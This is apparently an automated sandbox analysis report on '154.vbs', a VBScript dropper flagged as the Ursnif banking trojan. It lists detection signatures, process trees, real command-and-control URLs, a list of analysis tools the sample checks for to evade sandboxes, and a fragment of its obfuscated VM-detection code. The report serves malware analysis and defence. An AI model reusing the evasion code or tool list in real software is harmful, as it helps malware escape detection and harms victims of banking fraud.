
Analysis Report 154.vbs

Overview

General Information

Sample Name: 154.vbs
Analysis ID: 287107
MD5: 3acdc4ce2667c82ec38259a292da9c9a
SHA1: ccf456b6823ca7374e9dedaf6fe574de860bcbe4
SHA256: c637b67ae008019f3fbe71cb7c5891a8e73d08f4d0cdd927bb43bc499edfb410

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5968 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 1316 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4636 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5708 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1988 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3928 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5484 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5564 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fuss.egg | Avira: detection malicious, Label: TR/AD.UrsnifDropper.W
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fuss.egg | ReversingLabs: Detection: 10%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: msapplication.xml1.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xea057321,0x01d68d62</date><accdate>0xea057321,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xea057321,0x01d68d62</date><accdate>0xea057321,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xea07d54d,0x01d68d62</date><accdate>0xea07d54d,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xea07d54d,0x01d68d62</date><accdate>0xea07d54d,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xea0a379a,0x01d68d62</date><accdate>0xea0a379a,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.12.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xea0a379a,0x01d68d62</date><accdate>0xea0a379a,0x01d68d62</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 17 Sep 2020 17:24:33 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {13FA4A41-F956-11EA-90E2-ECF4BB862DED}.dat.12.dr | String found in binary or memory: http://api10.laptok.at/api1/0xZlfmW6cV9Vk/fFwZ7Kz9/wHutdaz7feZ6a2O45wvtH8o/spqIYIF8qV/QbRR0Z7x14QsFq
Source: {4AD0B2C2-F956-11EA-90E2-ECF4BB862DED}.dat.20.dr | String found in binary or memory: http://api10.laptok.at/api1/2_2FipkhkAv63cFsoR8Y/97uT0q3RL040aZKGP8H/J63beTphHVvsG6qkGHf1sK/wfY_2FdY
Source: {3C90EB31-F956-11EA-90E2-ECF4BB862DED}.dat.18.dr, ~DF077DF68F17F4A3C0.TMP.18.dr | String found in binary or memory: http://api10.laptok.at/api1/RC1zB15OsARXE/ls8klnva/52RGO_2BorxAsbjbNAmgJiL/uMphy8DyI_/2BUJaGUCstrBoV
Source: {2E55E87C-F956-11EA-90E2-ECF4BB862DED}.dat.16.dr | String found in binary or memory: http://api10.laptok.at/api1/yuZJfK0Ie/v_2FIITzhv9QYCD3fucs/qLa_2FhUQsy1fMaQBX2/HXVJHH_2FNWbrvKBLGJBW
Source: msapplication.xml.12.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.12.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.12.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.12.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.12.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.12.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.12.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.12.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:
Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:
Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: 154.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.evad.winVBS@13/69@20/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{13FA4A3F-F956-11EA-90E2-ECF4BB862DED}.dat
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\154.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1316 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3928 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5484 CREDAT:9474 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
Source: 154.vbs | Static file information: File size 1254418 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: d:\Eye\38\82\23\43\68\21\also\Small\Break\92\map.pdb | source: wscript.exe, 00000000.00000003.395966357.0000027AE8202000.00000004.00000001.sdmp, fuss.egg.0.dr

Data Obfuscation:
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface:
    WScript.ScriptName, cStr(672320042)) > 0 And fgjQHhf = 0) Then
    Exit Function
    End If
    Set jimnsDka = GetObject("winmgmts:\\.\root\cimv2")
    Set hygroscopiclItems = jimnsDka.ExecQuery("Select * from Win32_Processor", , (((107 - 1.0) - 14.0) + (-(114 - 70.0))))
    For Each Colosseum460 In hygroscopiclItems
    If Colosseum460.NumberOfCores < ((61 + (0.0)) + (-(33 + (72 + (-47.0))))) Then
    pXFhVA = True
    ' grapefruit, spectacle309, Ephraim. 4357318 methyl. 8949732 Gerard866 Phelps postcondition82 landmark methodology Fermi wacky, 1741975 backside. epigenetic desirous audacity exasperate Pusey lacquer chlordane Markovian858 Rockies Anglican detain is2 pass stingy straggle, 3849208 oblivious von adsorption anaglyph cartwheel bedimmed Dusenbury exorcist bearish chaste Katowice Berlioz deliver Braille tansy231, 2880955 allemand syenite Ecole flabbergast hoi smelly Peru finger, toddy
    End If
    Next
    REM sidewalk vary birth ana341 backwater sanatorium midmorn clang owe254. plankton admiralty handiwork, bestubble apical breathy alp dimorphic plantain stall connector. shingle module. 1758662 congregate GA718 grippe truckload nucleate Jason leasehold lustful tactile shagbark thematic match430 forsworn gable curfew Daimler for822 Baptiste749 ashame Ifni quack. Pavlovian waltz plenipotentiary criteria, grizzle ninety sulfurous14 nihilism Nicholls musty backtrack salvo Negroes trombone evince ascend hydrostatic Volta, propos exciton split, 7311223
    If pXFhVA Then
    OShea707
    End If
    ' gnarl Oxford, chap Fedora held Caleb horsepower557 parental participant junta nail Burtt scurvy chronograph699. sleazy tying godwit Carrie cancer Delilah chairlady762 sapient inlay thug TEX ternary gallon Phyllis130 pH lieu specular835 Foss barter dialup Herr Strickland lactose625 typo
    End Function
    Function fgjQHhf()
    Set MgibfID = CreateObject("WScript.Shell")
    REM teak64, Somerset, Islamic dromedary677 accent aesthetic Markham nocturne duck766 psychiatry. Disneyland raindrop Lagos Sutton jess198 thigh739 Agatha avaricious Negroid password afferent Kong secret Lathrop Dianne Gannett roadhouse checksumming can Harriman wop595 McKeon719 heard ether150. Spanish305 Missouri oxalic318 monkeyflower baseball fright headphone774 external95 SSW167. Durham693 serf line, Paul iceman wolfish redtop span, wag flank noisemake. 6676067 Hoffman196. gird803 chipmunk namesake Byzantine insightful wing diachronic woodward washy tumultuous, appanage. 1455222 Holocene, invoke458 convulsion Curtis isotropy786 ordinate patchwork pardon cameramen McKinley Callisto propitiate candidacy innocuous feldspar992 counterweight. wastage crosscut exorcism claimant
    Landis = MgibfID.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "672320042" + ".txt"
    If WScript.CreateObject("Scripting.FileSystemObject").FileExists(Landis) Then
    REM am20 reflector biz myopia Leeds Irwin pedantic urge447 greenwood demote Marx proteolysis gash brash Hausa indulge columnar servitor denominate forgetting macrophage candidacy927 chunk watchmake bromide927 lo

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fuss.egg (2 entries)

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.531025405.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531070616.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531081039.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1457565119.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531004316.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531058799.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530979626.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.531043381.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.530953612.0000000005B38000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\154.vbs
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 entries)

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE(
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEH
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.396877870.0000027AE36B3000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000002.420175007.0000027AE3670000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.396499524.0000027AE36AA000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation (4 entries)
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fuss.egg
Source: C:\Windows\System32\wscript.exe TID: 500 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.421074922.0000027AE8BF0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
